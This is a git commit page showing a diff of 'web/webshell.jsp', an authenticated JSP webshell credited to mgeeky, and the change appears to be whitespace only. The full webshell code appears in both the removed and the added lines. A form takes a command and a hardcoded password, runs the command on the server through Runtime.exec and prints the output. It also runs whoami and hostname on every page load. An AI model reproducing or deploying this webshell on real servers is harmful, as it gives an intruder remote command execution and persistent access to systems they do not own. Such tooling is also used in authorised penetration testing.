Webshell.jsp updated
This commit is contained in:
parent
685a6428ed
commit
f0f68868f3
110
web/webshell.jsp
110
web/webshell.jsp
|
@ -5,79 +5,79 @@
|
||||||
<%!
|
<%!
|
||||||
|
|
||||||
// =====================================================================
|
// =====================================================================
|
||||||
// Setup global password necessary to pass before using that webshell.
|
// Setup global password necessary to pass before using that webshell.
|
||||||
public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r";
|
public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r";
|
||||||
|
|
||||||
// =====================================================================
|
// =====================================================================
|
||||||
|
|
||||||
public String execute(String pass, String cmd, Boolean skip) {
|
public String execute(String pass, String cmd, Boolean skip) {
|
||||||
StringBuilder res = new StringBuilder();
|
StringBuilder res = new StringBuilder();
|
||||||
|
|
||||||
if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){
|
if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){
|
||||||
try {
|
try {
|
||||||
Process proc = Runtime.getRuntime().exec(cmd);
|
Process proc = Runtime.getRuntime().exec(cmd);
|
||||||
OutputStream outs = proc.getOutputStream();
|
OutputStream outs = proc.getOutputStream();
|
||||||
InputStream ins = proc.getInputStream();
|
InputStream ins = proc.getInputStream();
|
||||||
DataInputStream datains = new DataInputStream(ins);
|
DataInputStream datains = new DataInputStream(ins);
|
||||||
String datainsline = datains.readLine();
|
String datainsline = datains.readLine();
|
||||||
|
|
||||||
while ( datainsline != null) {
|
while ( datainsline != null) {
|
||||||
res.append(datainsline + "<br/>");
|
res.append(datainsline + "<br/>");
|
||||||
datainsline = datains.readLine();
|
datainsline = datains.readLine();
|
||||||
}
|
}
|
||||||
} catch( IOException e) {
|
} catch( IOException e) {
|
||||||
return "IOException: " + e.getMessage();
|
return "IOException: " + e.getMessage();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
return "Wrong password or no command issued.";
|
return "Wrong password or no command issued.";
|
||||||
}
|
}
|
||||||
|
|
||||||
String out = res.toString();
|
String out = res.toString();
|
||||||
if (out != null && out.length() > 5 && out.indexOf("<br/>") != -1) {
|
if (out != null && out.length() > 5 && out.indexOf("<br/>") != -1) {
|
||||||
out = out.substring(0, out.length() - 5);
|
out = out.substring(0, out.length() - 5);
|
||||||
}
|
}
|
||||||
out = out.replaceAll("(\r\n|\n\r|\n|\r)", "<br/>");
|
out = out.replaceAll("(\r\n|\n\r|\n|\r)", "<br/>");
|
||||||
return out;
|
return out;
|
||||||
}
|
}
|
||||||
%><!DOCTYPE html>
|
%><!DOCTYPE html>
|
||||||
<html>
|
<html>
|
||||||
<head>
|
<head>
|
||||||
<title>JSP Application</title>
|
<title>JSP Application</title>
|
||||||
</head>
|
</head>
|
||||||
<body>
|
<body>
|
||||||
<h3>Authenticated JSP Webshell.</h3>
|
<h3>Authenticated JSP Webshell.</h3>
|
||||||
<i style="font-size:12px">You need to provide a valid password in order to leverage this application.</i>
|
<i style="font-size:12px">You need to provide a valid password in order to leverage this application.</i>
|
||||||
<br/>
|
<br/>
|
||||||
<font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
|
<font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
|
||||||
<br/>
|
<br/>
|
||||||
<hr/>
|
<hr/>
|
||||||
<form method=post>
|
<form method=post>
|
||||||
<table style="width:100%; font-size: 12px">
|
<table style="width:100%; font-size: 12px">
|
||||||
<tr>
|
<tr>
|
||||||
<td>OS:</td><td style="width:100%">
|
<td>OS:</td><td style="width:100%">
|
||||||
<% out.print(System.getProperty("os.name")); %>
|
<% out.print(System.getProperty("os.name")); %>
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td><b style="color:red; font-size:10px">Password:</b></td><td style="width:90%"><input type=password width=40 name="password" value='<% out.print((request.getParameter("password") != null) ? request.getParameter("password") : ""); %>' /></td>
|
<td><b style="color:red; font-size:10px">Password:</b></td><td style="width:90%"><input type=password width=40 name="password" value='<% out.print((request.getParameter("password") != null) ? request.getParameter("password") : ""); %>' /></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td><b style="color:blue; font-size:11px"><% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%></b></td><td style="width:90%"><input type=text size=100 name="cmd" value='<% out.print((request.getParameter("cmd") != null) ? request.getParameter("cmd") : "uname -a"); %>' onClick="" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }" /></td>
|
<td><b style="color:blue; font-size:11px"><% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%></b></td><td style="width:90%"><input type=text size=100 name="cmd" value='<% out.print((request.getParameter("cmd") != null) ? request.getParameter("cmd") : "uname -a"); %>' onClick="" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }" /></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td><input type=submit style="position:absolute;left:-9999px;width:1px;height:1px;" tabindex="-1"/></td><td></td>
|
<td><input type=submit style="position:absolute;left:-9999px;width:1px;height:1px;" tabindex="-1"/></td><td></td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
</form>
|
</form>
|
||||||
<hr />
|
<hr />
|
||||||
<pre style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"><%
|
<pre style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"><%
|
||||||
if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
|
if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
|
||||||
out.println("<br/>server$ " + request.getParameter("cmd") + "<br/>");
|
out.println("<br/>server$ " + request.getParameter("cmd") + "<br/>");
|
||||||
out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false));
|
out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false));
|
||||||
}
|
}
|
||||||
%></pre>
|
%></pre>
|
||||||
|
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue